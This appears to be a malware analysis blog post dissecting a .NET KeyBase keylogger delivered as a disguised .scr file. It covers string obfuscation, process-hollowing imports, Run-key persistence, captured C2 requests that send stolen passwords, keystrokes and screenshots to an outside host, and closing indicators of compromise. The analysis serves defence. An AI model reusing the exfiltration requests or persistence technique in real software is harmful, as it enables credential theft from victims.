It came with compressed file named Product_details.gz. when extracted; it presented a file named Payment_45476.scr. This file is windows executable which was .net compiled, The file was then opened with a tool called ILSPY in order to analyze its inner workings.
- Looking at its main function it seems it created two threads:
The function below looks to be using a primitive form of obfuscation that consist on reversing strings.
Looking at the function below; the malware uses an Encryption class that handles the decryption of several strings found throughout the code see below.
Looking at the function below, it seems it invokes the DecryptText function declared on the Encryption class.
The decoded data corresponds the imports the malware will be using:
- CreateProcessA
- GetThreadContext
- SetThreadContext
- Wow64SetThreadContext
- ReadProcessMemory
- WriteProcessMemory
- NtUnmapViewOfSection
- VirtualAllocEx
- ResumeThread
[CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]
[RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe
The malware then starts to reach out to its c2. The requests indicate the malware has the following capabilities:
- Takes a screenshot of the current working window
- Acts as a keylogger and credential stealer.
- Captures clipboard content.
GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM
HTTP/1.1
"steals passwords from chrome password cache"
GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY
HTTP/1.1
"it has keylogging capabilities"
GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM
HTTP/1.1
POST /wp-includes/css/keybase/image/upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930
Host: examgist.com
On looking further to the c2 callbacks, it was noticed the locations in which the screenshots were shared was world readable. See sample below:
The login panel was also available :
In conclusion ,this malware is considered primitive based on its design. however, it can certainly cause damage its kelogging, screen sharing and credential stealing capabilities make it very attractive to skiddies. thank you for reading
MD5:
7c6a2697df26582b438c21ee7ce5b0b1 Payment_45476.scr
398af2fd86ce37d6d3052eb7503b2790 Order_25464.scr
78c4256eb2003db620a45adba44f404c Order_34002.gz
9dada7b67f5066e6f5d394222240beb9 Product_details.gz
C2:
http://examgist[.]com/wp-includes/css/keybase/login.php
VT:
https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/